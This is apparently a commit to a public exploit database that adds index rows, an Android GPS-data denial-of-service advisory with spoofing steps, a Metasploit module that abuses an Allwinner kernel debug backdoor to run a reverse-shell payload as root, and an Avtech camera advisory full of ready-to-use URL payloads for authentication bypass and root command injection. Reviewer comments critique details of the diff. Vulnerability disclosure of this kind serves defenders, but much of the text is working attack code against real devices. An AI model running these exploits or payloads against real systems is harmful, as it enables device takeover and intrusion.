DB: 2016-10-12
12 new exploits
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation
Spacemarc News - Cross-Site Request Forgery (Add New Post)
Minecraft Launcher - Insecure File Permissions Privilege Escalation
BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery
phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery
sheed AntiVirus - Unquoted Service Path Privilege Escalation
AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities
RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection
Android - 'gpsOneXtra' Data Files Denial of Service
Linux Kernel 3.13.1 - Recvmmsg Privilege Escalation (Metasploit)
Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)
ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting
ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)
parent a3dbf3113e
commit f8b17d14a1
13 changed files with 1496 additions and 1 deletions

14  files.csv
@ -36606,7 +36606,19 @@ id,file,description,date,author,platform,type,port
|
|||
40486,platforms/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps,0
|
||||
40487,platforms/php/webapps/40487.txt,"PHP Press Release - Stored Cross Site Scripting",2016-10-09,Besim,php,webapps,0
|
||||
40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0
|
||||
40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
|
||||
40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
|
||||
40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0
|
||||
40491,platforms/multiple/remote/40491.py,"HP Client - Automation Command Injection / Remote Code Execution",2016-10-10,SlidingWindow,multiple,remote,0
|
||||
40492,platforms/php/webapps/40492.html,"Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
|
||||
40493,platforms/php/webapps/40493.html,"Spacemarc News - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
|
||||
40494,platforms/windows/local/40494.txt,"Minecraft Launcher - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0
|
||||
40495,platforms/php/webapps/40495.html,"BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery",2016-10-11,Besim,php,webapps,80
|
||||
40496,platforms/php/webapps/40496.html,"phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery",2016-10-11,Besim,php,webapps,80
|
||||
40497,platforms/windows/local/40497.txt,"sheed AntiVirus - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local,0
|
||||
40500,platforms/cgi/webapps/40500.txt,"AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities",2016-10-11,"Gergely Eberhardt",cgi,webapps,80
|
||||
40501,platforms/xml/webapps/40501.txt,"RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection",2016-10-11,"SEC Consult",xml,webapps,0
|
||||
40502,platforms/android/dos/40502.txt,"Android - 'gpsOneXtra' Data Files Denial of Service",2016-10-11,"Nightwatch Cybersecurity Research",android,dos,0
|
||||
40503,platforms/linux/local/40503.rb,"Linux Kernel 3.13.1 - Recvmmsg Privilege Escalation (Metasploit)",2016-10-11,Metasploit,linux,local,0
|
||||
40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0
|
||||
40505,platforms/php/webapps/40505.txt,"ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting",2016-10-11,Besim,php,webapps,0
|
||||
40506,platforms/php/webapps/40506.html,"ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)",2016-10-11,Besim,php,webapps,0
|
||||
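Review bot: the two rows with id 40489 (both pointing at platforms/lin_x86-64/local/40489.txt) differ only in the quoting of 'IP6T_SO_SET_REPLACE' in the description; the rendering has dropped the +/- markers, and the hunk counts (-7,+19) together with the commit's single deletion indicate that the unquoted row is the one removed and the quoted row its replacement, so confirm that files.csv does not end up carrying two rows for id 40489. Second, the port column is inconsistent across the new web-application rows: 40495 and 40496 (BirdBlog, phpEnter) record port 80, while the other php/webapps rows from the same author in this hunk (40492, 40493, 40505, 40506) record 0; pick one convention. Finally, ids 40498 and 40499 are skipped between 40497 and 40500, which is fine if those numbers are reserved elsewhere, but the gap deserves a word in the commit message.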
234  platforms/android/dos/40502.txt  Executable file
@ -0,0 +1,234 @@
|
|||
Original at:
|
||||
https://wwws.nightwatchcybersecurity.com/2016/10/04/advisory-cve-2016-5348-2/
|
||||
|
||||
Summary
|
||||
|
||||
Android devices can be crashed remotely forcing a halt and then a soft
|
||||
reboot by a MITM attacker manipulating assisted GPS/GNSS data provided
|
||||
by Qualcomm. This issue affects the open source code in AOSP and
|
||||
proprietary code in a Java XTRA downloader provided by Qualcomm. The
|
||||
Android issue was fixed by in the October 2016 Android bulletin.
|
||||
Additional patches have been issued by Qualcomm to the proprietary
|
||||
client in September of 2016. This issue may also affect other
|
||||
platforms that use Qualcomm GPS chipsets and consume these files but
|
||||
that has not been tested by us, and requires further research.
|
||||
|
||||
Background – GPS and gpsOneXtra
|
||||
|
||||
Most mobile devices today include ability to locate themselves on the
|
||||
Earth’s surface by using the Global Positioning System (GPS), a system
|
||||
originally developed and currently maintained by the US military.
|
||||
Similar systems developed and maintained by other countries exist as
|
||||
well including Russia’s GLONASS, Europe’s Galileo, and China’s Beidou.
|
||||
The GPS signals include an almanac which lists orbit and status
|
||||
information for each of the satellites in the GPS constellation. This
|
||||
allows the receivers to acquire the satellites quicker since the
|
||||
receiver would not need to search blindly for the location of each
|
||||
satellite. Similar functionality exists for other GNSS systems. In
|
||||
order to solve the problem of almanac acquisition, Qualcomm developed
|
||||
the gpsOneXtra system in 2007 (also known as IZat XTRA Assistance
|
||||
since 2013). This system provides ability to GPS receivers to download
|
||||
the almanac data over the Internet from Qualcomm-operated servers. The
|
||||
format of these XTRA files is proprietary but seems to contain current
|
||||
satellite location data plus estimated locations for the next 7 days,
|
||||
as well as additional information to improve signal acquisition. Most
|
||||
Qualcomm mobile chipsets and GPS chips include support for this
|
||||
technology. A related Qualcomm technology called IZat adds ability to
|
||||
use WiFi and cellular networks for locations in addition to GPS.
|
||||
|
||||
Background – Android and gpsOneXtra Data Files
|
||||
|
||||
During our network monitoring of traffic originating from an Android
|
||||
test device, we discovered that the device makes periodic calls to the
|
||||
Qualcomm servers to retrieve gpsOneXtra assistance files. These
|
||||
requests were performed almost every time the device connected to a
|
||||
WiFi network. As discovered by our research and confirmed by the
|
||||
Android source code, the following URLs were used:
|
||||
|
||||
http://xtra1.gpsonextra.net/xtra.bin
|
||||
http://xtra2.gpsonextra.net/xtra.bin
|
||||
http://xtra3.gpsonextra.net/xtra.bin
|
||||
|
||||
http://xtrapath1.izatcloud.net/xtra2.bin
|
||||
http://xtrapath2.izatcloud.net/xtra2.bin
|
||||
http://xtrapath3.izatcloud.net/xtra2.bin
|
||||
|
||||
WHOIS record show that both domains – gpsonextra.net and izatcloud.net
|
||||
are owned by Qualcomm. Further inspection of those URLs indicate that
|
||||
both domains are being hosted and served from Amazon’s Cloudfront CDN
|
||||
service (with the exception of xtra1.gpsonextra.net which is being
|
||||
served directly by Qualcomm). On the Android platform, our inspection
|
||||
of the Android source code shows that the file is requested by an
|
||||
OS-level Java process (GpsXtraDownloader.java), which passes the data
|
||||
to a C++ JNI class
|
||||
(com_android_server_location_GnssLocationProvider.cpp), which then
|
||||
injects the files into the Qualcomm modem or firmware. We have not
|
||||
inspected other platforms in detail, but suspect that a similar
|
||||
process is used. Our testing was performed on Android v6.0, patch
|
||||
level of January 2016, on a Motorola Moto G (2nd gen) GSM phone, and
|
||||
confirmed on a Nexus 6P running Android v6.01, with May 2016 security
|
||||
patches. Qualcomm has additionally performed testing on their
|
||||
proprietary Java XTRA downloader client confirming this vulnerability.
|
||||
|
||||
Vulnerability Details
|
||||
|
||||
Android platform downloads XTRA data files automatically when
|
||||
connecting to a new network. This originates from a Java class
|
||||
(GpsXtraDownloader.java), which then passes the file to a C++/JNI
|
||||
class (com_android_server_location_GnssLocationProvider.cpp) and then
|
||||
injects it into the Qualcomm modem.
|
||||
|
||||
The vulnerability is that both the Java and the C++ code do not check
|
||||
how large the data file actually is. If a file is served that is
|
||||
larger than the memory available on the device, this results in all
|
||||
memory being exhausted and the phone halting and then soft rebooting.
|
||||
The soft reboot was sufficient to recover from the crash and no data
|
||||
was lost. While we have not been able to achieve remote code execution
|
||||
in either the Qualcomm modem or in the Android OS, this code path can
|
||||
potentially be exploited for such attacks and would require more
|
||||
research.
|
||||
|
||||
To attack, an MITM attacker located anywhere on the network between
|
||||
the phone being attacked and Qualcomm’s servers can initiate this
|
||||
attack by intercepting the legitimate requests from the phone, and
|
||||
substituting their own, larger files. Because the default Chrome
|
||||
browser on Android reveals the model and build of the phone (as we
|
||||
have written about earlier), it would be possible to derive the
|
||||
maximum memory size from that information and deliver the
|
||||
appropriately sized attack file. Possible attackers can be hostile
|
||||
hotspots, hacked routers, or anywhere along the backbone. This is
|
||||
somewhat mitigated by the fact that the attack file would need to be
|
||||
as large as the memory on the phone.
|
||||
|
||||
The vulnerable code resides here – (GpsXtraDownloader.java, lines 120-127):
|
||||
|
||||
connection.connect()
|
||||
int statusCode = connection.getResponseCode();
|
||||
if (statusCode != HttpURLConnection.HTTP_OK) {
|
||||
if (DEBUG) Log.d(TAG, “HTTP error downloading gps XTRA: “ + statusCode);
|
||||
return null;
|
||||
}
|
||||
return Streams.readFully(connection.getInputStream());
|
||||
|
||||
Specifically, the affected code is using Streams.readFully to read the
|
||||
entire file into memory without any kind of checks on how big the file
|
||||
actually is.
|
||||
|
||||
Additional vulnerable code is also in the C++ layer –
|
||||
(com_android_server_location_GnssLocationProvider.cpp, lines 856-858):
|
||||
|
||||
jbyte* bytes = (jbyte *)env->GetPrimitiveArrayCritical(data, 0);
|
||||
sGpsXtraInterface->inject_xtra_data((char *)bytes, length);
|
||||
env->ReleasePrimitiveArrayCritical(data, bytes, JNI_ABORT);
|
||||
|
||||
Once again, no size checking is done. We were able to consistently
|
||||
crash several different Android phones via a local WiFi network with
|
||||
the following error message:
|
||||
|
||||
java.lang.OutOfMemoryError: Failed to allocate a 478173740 byte
|
||||
allocation with 16777216 free bytes and 252MB until OOM
|
||||
at java.io.ByteArrayOutputStream.expand(ByteArrayOutputStream.java:91)
|
||||
|
||||
(It should be noted that we were not able to consistently and reliable
|
||||
achieve a crash in the C++/JNI layer or the Qualcomm modem itself)
|
||||
|
||||
Steps To Replicate (on Ubuntu 16.04)
|
||||
1. Install DNSMASQ:
|
||||
sudo apt-get install dnsmasq
|
||||
|
||||
2. Install NGINX:
|
||||
sudo apt-get install nginx
|
||||
|
||||
3. Modify the /etc/hosts file to add the following entries to map to
|
||||
the IP of the local computer (varies by vendor of the phone):
|
||||
192.168.1.x xtra1.gpsonextra.net
|
||||
192.168.1.x xtra2.gpsonextra.net
|
||||
192.168.1.x xtra3.gpsonextra.net
|
||||
192.168.1.x xtrapath1.izatcloud.net
|
||||
192.168.1.x xtrapath2.izatcloud.net
|
||||
192.168.1.x xtrapath3.izatcloud.net
|
||||
|
||||
4. Configure /etc/dnsmasq.conf file to listed on the IP:
|
||||
listen-address=192.168.1.x
|
||||
|
||||
5. Restart DNSMASQ:
|
||||
sudo /etc/init.d/dnsmasq restart
|
||||
|
||||
6. Use fallocate to create the bin files in “/var/www/html/”
|
||||
sudo fallocate -s 2.5G xtra.bin
|
||||
sudo fallocate -s 2.5G xtra2.bin
|
||||
sudo fallocate -s 2.5G xtra3.bin
|
||||
|
||||
7. Modify the settings on the Android test phone to static, set DNS to
|
||||
point to “192.168.1.x”. AT THIS POINT – Android will resolve DNS
|
||||
against the local computer, and serve the GPS files from it.
|
||||
|
||||
To trigger the GPS download, disable WiFi and enable Wifi, or
|
||||
enable/disable Airplane mode. Once the phone starts downloading the
|
||||
files, the screen will go black and it will reboot.
|
||||
|
||||
PLEASE NOTE: on some models, the XTRA file is cached and not retrieved
|
||||
on every network connect. For those models, you may need to reboot the
|
||||
phone and/or follow the injection commands as described here. You can
|
||||
also use an app like GPS Status and ToolboxGPS Status and Toolbox.
|
||||
|
||||
The fix would be to check for file sizes in both Java and native C++ code.
|
||||
|
||||
Mitigation Steps
|
||||
|
||||
For the Android platform, users should apply the October 2016 Android
|
||||
security bulletin and any patches provided by Qualcomm. Please note
|
||||
that as per Qualcomm, the patches for this bug only include fixes to
|
||||
the Android Open Source Project (AOSP) and the Qualcomm Java XTRA
|
||||
downloader clients. Apple and Microsoft have indicated to us via email
|
||||
that GPS-capable devices manufactured by them including iPad, iPhones,
|
||||
etc. and Microsoft Surface and Windows Phone devices are not affected
|
||||
by this bug. Blackberry devices powered by Android are affected but
|
||||
the Blackberry 10 platform is not affected by this bug. For other
|
||||
platforms, vendors should follow guidance provided by Qualcomm
|
||||
directly via an OEM bulletin.
|
||||
|
||||
Bounty Information
|
||||
|
||||
This bug has fulfilled the requirements for Google’s Android Security
|
||||
Rewards and a bounty has been paid.
|
||||
|
||||
References
|
||||
|
||||
Android security bulletin: October 2016
|
||||
CERT/CC tracking: VR-179
|
||||
CVE-ID: CVE-2016-5348
|
||||
Google: Android bug # 213747 / AndroidID-29555864
|
||||
|
||||
CVE Information
|
||||
|
||||
As provided by Qualcomm:
|
||||
|
||||
CVE: CVE-2016-5348
|
||||
Access Vector: Network
|
||||
Security Risk: High
|
||||
Vulnerability: CWE-400: Uncontrolled Resource Consumption (‘Resource
|
||||
Exhaustion’)
|
||||
Description: When downloading a very large assistance data file, the
|
||||
client may crash due to out of memory error.
|
||||
Change summary:
|
||||
|
||||
check download size ContentLength before downloading data
|
||||
catch OOM exception
|
||||
|
||||
Credits
|
||||
|
||||
We would like to thank CERT/CC for helping to coordinate this process,
|
||||
and all of the vendors involved for helpful comments and a quick
|
||||
turnaround. This bug was discovered by Yakov Shafranovich, and the
|
||||
advisory was also written by Yakov Shafranovich.
|
||||
|
||||
Timeline
|
||||
|
||||
201606-20: Android bug report filed with Google
|
||||
2016-06-21: Android bug confirmed
|
||||
2016-06-21: Bug also reported to Qualcomm and CERT.
|
||||
2016-09-14: Coordination with Qualcomm on public disclosure
|
||||
2016-09-15: Coordination with Google on public disclosure
|
||||
2016-10-03: Android security bulletin released with fix
|
||||
2016-10-04: Public disclosure
|
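Review bot: the fix recorded under 'Change summary' ('check download size ContentLength before downloading data') is not sufficient on its own against the attacker model the advisory itself describes: an on-path attacker who can substitute xtra.bin can equally substitute the Content-Length header, or omit it with chunked transfer, so the change that actually closes CWE-400 here is a hard cap on the number of bytes read from the stream regardless of what the header claims, with the OOM catch as a backstop rather than the primary control. Smaller points in the text as mirrored: the Java excerpt (GpsXtraDownloader.java, lines 120-127) has lost the semicolon after connection.connect() and carries typographic quotes in the Log.d string, so it will not compile if pasted; the first timeline entry reads '201606-20' where '2016-06-20' is evidently meant; 'was fixed by in the October 2016' and 'to listed on the IP' are typos; and 'follow the injection commands as described here' points at a hyperlink that did not survive the plain-text conversion, leaving the reader without a target.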
83  platforms/android/local/40504.rb  Executable file
@ -0,0 +1,83 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require "msf/core"
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Linux::Priv
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
"Name" => "Allwinner 3.4 Legacy Kernel Local Privilege Escalation",
|
||||
"Description" => %q{
|
||||
This module attempts to exploit a debug backdoor privilege escalation in
|
||||
Allwinner SoC based devices.
|
||||
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
|
||||
Vulnerable OS: all OS images available for Orange Pis,
|
||||
any for FriendlyARM's NanoPi M1,
|
||||
SinoVoip's M2+ and M3,
|
||||
Cuebietech's Cubietruck +
|
||||
Linksprite's pcDuino8 Uno
|
||||
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
|
||||
},
|
||||
"License" => MSF_LICENSE,
|
||||
"Author" =>
|
||||
[
|
||||
"h00die <mike@stcyrsecurity.com>", # Module
|
||||
"KotCzarny" # Discovery
|
||||
],
|
||||
"Platform" => [ "android", "linux" ],
|
||||
"DisclosureDate" => "Apr 30 2016",
|
||||
"DefaultOptions" => {
|
||||
"payload" => "linux/armle/mettle/reverse_tcp"
|
||||
},
|
||||
"Privileged" => true,
|
||||
"Arch" => ARCH_ARMLE,
|
||||
"References" =>
|
||||
[
|
||||
[ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"],
|
||||
[ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:" \
|
||||
"https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"],
|
||||
[ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"]
|
||||
],
|
||||
"SessionTypes" => [ "shell", "meterpreter" ],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Auto', { } ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
))
|
||||
end
|
||||
|
||||
def check
|
||||
backdoor = '/proc/sunxi_debug/sunxi_debug'
|
||||
if file_exist?(backdoor)
|
||||
Exploit::CheckCode::Appears
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
backdoor = '/proc/sunxi_debug/sunxi_debug'
|
||||
if file_exist?(backdoor)
|
||||
pl = generate_payload_exe
|
||||
|
||||
exe_file = "/tmp/#{rand_text_alpha(5)}.elf"
|
||||
vprint_good "Backdoor Found, writing payload to #{exe_file}"
|
||||
write_file(exe_file, pl)
|
||||
cmd_exec("chmod +x #{exe_file}")
|
||||
|
||||
vprint_good 'Escalating'
|
||||
cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}")
|
||||
else
|
||||
print_error "Backdoor #{backdoor} not found."
|
||||
end
|
||||
end
|
||||
end
|
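Review bot: the payload written to exe_file under /tmp in exploit is never removed; the module includes neither Msf::Exploit::FileDropper nor a register_file_for_cleanup(exe_file) call, unlike the recvmmsg module added in this same commit, so every run leaves a randomly named ELF behind on the target. Also, exploit repeats the file_exist? test on the backdoor path instead of calling check, and the literal '/proc/sunxi_debug/sunxi_debug' is duplicated in both methods; hoist it to a single constant. Style: the info hash mixes "Name"/"Description" in double quotes with 'Targets'/'DefaultTarget' in single quotes, and 'Cuebietech' in the description looks like a misspelling of CubieTech, the Cubietruck vendor.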
218  platforms/cgi/webapps/40500.txt  Executable file
@ -0,0 +1,218 @@
|
|||
Avtech devices multiple vulnerabilities
|
||||
--------------------------------------------------
|
||||
|
||||
Platforms / Firmware confirmed affected:
|
||||
- Every Avtech device (IP camera, NVR, DVR) and firmware version. [4]
|
||||
contains the list of confirmed firmware versions, which are affected.
|
||||
- Product page: http://www.avtech.com.tw/
|
||||
|
||||
ôAVTECH, founded in 1996, is one of the worldÆs leading CCTV
|
||||
manufacturers. With stably increasing revenue and practical business
|
||||
running philosophy, AVTECH has been ranked as the largest public-listed
|
||||
company among the Taiwan surveillance industry. AVTECH makes every
|
||||
effort on the innovation of technology, product and implementation.
|
||||
Based on years of research and industry experience, AVTECH has obtained
|
||||
a leading position on mobile platform support and provides a full range
|
||||
of surveillance products.ö
|
||||
|
||||
Avtech is the second most popular search term in Shodan. According to
|
||||
Shodan, more than 130.000 Avtech devices are exposed to the internet.
|
||||
|
||||
Vulnerabilities
|
||||
---------------
|
||||
1) Plaintext storage of administrative password
|
||||
Every user password is stored in clear text. An attacker with access to
|
||||
the device itself can easily obtain the full list of passwords. By
|
||||
exploiting command injection or authentication bypass issues, the clear
|
||||
text admin password can be retrieved.
|
||||
|
||||
2) Missing CSRF protection
|
||||
The web interface does not use any CSRF protection. If a valid session
|
||||
exists for the user, the attacker can modify all settings of the device
|
||||
via CSRF. If there is no valid session, but the user did not change the
|
||||
default admin password, the attacker can log in as admin via CSRF as well.
|
||||
|
||||
3) Unauthenticated information disclosure
|
||||
Under the /cgi-bin/nobody folder every CGI script can be accessed
|
||||
without authentication.
|
||||
POC: GET /cgi-bin/nobody/Machine.cgi?action=get_capability
|
||||
Example response:
|
||||
Firmware.Version=1011-1005-1008-1002
|
||||
MACAddress=00:0E:53:xx:xx:xx
|
||||
Product.Type=DVR
|
||||
Product.ID=308B
|
||||
Product.ShortName=V_full_Indep,V_Multistream
|
||||
Video.System=PAL
|
||||
Audio.DownloadFormat=ULAW
|
||||
Video.Input.Num=8
|
||||
Video.Output.Num=1
|
||||
Video.Format=H264,MJPEG
|
||||
Video.Format.Default=H264
|
||||
Video.Resolution=4CIF,CIF
|
||||
Video.Quality=BEST,HIGH,NORMAL,BASIC
|
||||
Video.Local.Input.Num=8
|
||||
Video.Local.Output.Num=1
|
||||
Video.Local.Format=H264,MJPEG
|
||||
Audio.Input.Num=8
|
||||
Audio.Output.Num=1
|
||||
Audio.Format=ULAW
|
||||
Audio.Local.Input.Num=8
|
||||
Audio.Local.Output.Num=1
|
||||
Audio.Local.Format=PCM
|
||||
Language.Default=ENGLISH
|
||||
Language.Support=ENGLISH&CHINESE&JAPANESE&FRANCE&GERMAN&SPANISH&PORTUGUESE&ITALIAN&TURKISH&POLISH&RUSSIAN&CUSTOMIZE&THAI
|
||||
&VIETNAM&DUTCH&GREEK&ARABIC&CZECH&HUNGARIAN&HEBREW&CHINA&
|
||||
Capability=D0,80,A,80
|
||||
PushNotify.MaxChannel=8
|
||||
|
||||
4) Unauthenticated SSRF in DVR devices
|
||||
In case of DVR devices, Search.cgi can be accessed without
|
||||
authentication. This service is responsible for searching and accessing
|
||||
IP cameras in the local network. In newer firmware versions, Search.cgi
|
||||
provides the cgi_query action, which performs an HTTP request with the
|
||||
specified parameters. By modifying the ip, port and queryb64str
|
||||
parameters, an attacker is able to perform arbitrary HTTP requests
|
||||
through the DVR device without authentication.
|
||||
POC:
|
||||
http://<device_ip>/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==
|
||||
|
||||
5) Unauthenticated command injection in DVR devices
|
||||
The cgi_query action in Search.cgi performs HTML requests with the wget
|
||||
system command, which uses the received parameters without sanitization
|
||||
or verification. By exploiting this issue, an attacker can execute any
|
||||
system command with root privileges without authentication.
|
||||
POC:
|
||||
http://<device_ip>/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$(ps|grep%20Search.cgi|grep%20-v%20grep|head%20-n%201|awk%20'{print%20"/tmp/"$1".log"}');&password=admin
|
||||
|
||||
6) Authentication bypass #1
|
||||
Video player plugins are stored as .cab files in the web root, which can
|
||||
be accessed and downloaded without authentication. The cab file request
|
||||
verification in the streamd web server is performed with the strstr
|
||||
function, which means that a request should not be authenticated if it
|
||||
contains the ô.cabö string anywhere in the URL. We note that some of the
|
||||
models contain an additional check in the CgiDaemon, which allows
|
||||
unauthenticated cgi access only under the /cgi-bin/nobody folder.
|
||||
POC:
|
||||
http://<device_ip>/cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
|
||||
|
||||
7) Authentication bypass #2
|
||||
Cgi scripts in the /cgi-bin/nobody folder can be accessed without
|
||||
authentication (e.g. for login). The streamd web server verifies whether
|
||||
the request can be performed without authentication by searching for the
|
||||
ô/nobodyö string in the URL with the strstr function. Thus, if a
|
||||
request contains the "/nobody" string anywhere in the URL, it does not
|
||||
have to be authenticated. We note that some of the models contain an
|
||||
additional check in the CgiDaemon, which allows unauthenticated cgi
|
||||
access only under the /cgi-bin/nobody folder.
|
||||
POC:
|
||||
http://<device_ip>/cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*
|
||||
|
||||
8) Unauthenticated file download from web root
|
||||
If a cab file is requested, the web server sends the file without
|
||||
processing it. Because the streamd web server verifies the cab file
|
||||
request by searching for the ô.cabö string in the URL with the strstr
|
||||
function, any file (even the cgi scripts) in the web root can be
|
||||
downloaded without authentication.
|
||||
POC: http://<device_ip>/cgi-bin/cgibox?.cab
|
||||
|
||||
9) Login captcha bypass #1
|
||||
To prevent brute-forcing attempts, Avtech devices require a captcha for
|
||||
login requests. However, if the login requests contain the login=quick
|
||||
parameter, the captcha verification is bypassed.
|
||||
POC:
|
||||
http://<device_ip>/cgi-bin/nobody/VerifyCode.cgi?account=<b64(username:password)>&login=quick
|
||||
|
||||
10) Login captcha bypass #2
|
||||
Instead of using a random session ID, Avtech devices use the
|
||||
base64-encoded username and password as the Cookie value. Since the IP
|
||||
address of the logged in user is not stored, if an attacker sets the
|
||||
Cookie manually, the captcha verification can by bypassed easily.
|
||||
|
||||
11) Authenticated command injection in CloudSetup.cgi
|
||||
Devices that support the Avtech cloud contain CloudSetup.cgi, which can
|
||||
be accessed after authentication. The exefile parameter of a
|
||||
CloudSetup.cgi request specifies the system command to be executed.
|
||||
Since there is no verification or white list-based checking of the
|
||||
exefile parameter, an attacker can execute arbitrary system commands
|
||||
with root privileges.
|
||||
POC: http://<device_ip>/cgi-bin/supervisor/CloudSetup.cgi?exefile=ps
|
||||
|
||||
12) Authenticated command injection in adcommand.cgi
|
||||
Some of the Avtech devices contain adcommand.cgi to perform ActionD
|
||||
commands. The adcommand.cgi can be accessed after authentication. In
|
||||
newer devices the ActionD daemon provides the DoShellCmd function, which
|
||||
performs a system call with the specified parameters. Since there is no
|
||||
verification or white list-based checking of the parameter of the
|
||||
DoShellCmd function, an attacker can execute arbitrary system commands
|
||||
with root privileges.
|
||||
POC:
|
||||
POST /cgi-bin/supervisor/adcommand.cgi HTTP/1.1
|
||||
Host: <device_ip>
|
||||
Content-Length: 23
|
||||
Cookie: SSID=YWRtaW46YWRtaW4=
|
||||
|
||||
DoShellCmd "strCmd=ps&"
|
||||
|
||||
13) Authenticated command injection in PwdGrp.cgi
|
||||
The PwdGrp.cgi uses the username, password and group parameters in a new
|
||||
user creation or modification request in a system command without
|
||||
validation or sanitization. Thus and attacker can execute arbitrary
|
||||
system commands with root privileges.
|
||||
We are aware that this vulnerability is being exploited in the wild!
|
||||
POC:
|
||||
http://<device_ip>/cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;reboot;&grp=SUPERVISOR&lifetime=5%20MIN
|
||||
|
||||
14) HTTPS used without certificate verification
|
||||
The SyncCloudAccount.sh, QueryFromClient.sh and SyncPermit.sh scripts
|
||||
use wget to access HTTPS sites, such as https://payment.eagleeyes.tw, by
|
||||
specifying the no-check-certificate parameter. Thus wget skips server
|
||||
certificate verification and a MITM attack is possible against the HTTPS
|
||||
communication.
|
||||
|
||||
Timeline
|
||||
2015.10.19: First attempt to contact with Avtech, but we did not receive
|
||||
any response
|
||||
2016.05.24: Second attempt to contact Avtech without any response
|
||||
2016.05.27: Third attempt to contact Avtech by sending e-mail to public
|
||||
Avtech e-mail addresses. We did not receive any response.
|
||||
2016.xx.xx: Full disclosure
|
||||
|
||||
POC
|
||||
---
|
||||
POC script is available to demonstrate the following problems [3]:
|
||||
- Unauthenticated information leakage (capabilities)
|
||||
- Authentication bypass (.cab, nobody)
|
||||
- Unauthenticated SSRF on DVR devices
|
||||
- Unauthenticated command injection on DVR devices
|
||||
- Login captcha bypass with login=quick or manual cookie creation
|
||||
- CloudSetup.cgi command injection after authentication
|
||||
- adcommand.cgi command injection after authentication
|
||||
|
||||
A video demonstration is also available [1], which presents some of the
|
||||
above problems.
|
||||
|
||||
Recommendations
|
||||
---------------
|
||||
Unfortunately there is no solution available for these vulnerabilities
|
||||
at the moment. You can take the following steps to protect your device:
|
||||
- Change the default admin password
|
||||
- Never expose the web interface of any Avtech device to the internet
|
||||
|
||||
We note that the above vulnerabilities were found within a short period
|
||||
of time without a systematic approach. Based on the vulnerability types
|
||||
we found and the overall code quality, the devices should contain much
|
||||
more problems.
|
||||
|
||||
Credits
|
||||
-------
|
||||
This vulnerability was discovered and researched by Gergely Eberhardt
|
||||
(@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu)
|
||||
|
||||
References
|
||||
----------
|
||||
[1]
|
||||
https://www.search-lab.hu/advisories/126-avtech-devices-multiple-vulnerabilities
|
||||
<http://www.search-lab.hu/advisories/126-avtech-devices-multiple-vulnerabilities>
|
||||
[2] https://youtu.be/BUx8nLlIMxI
|
||||
[3] https://github.com/ebux/AVTECH
|
||||
[4] http://www.search-lab.hu/media/vulnerability_matrix.txt
|
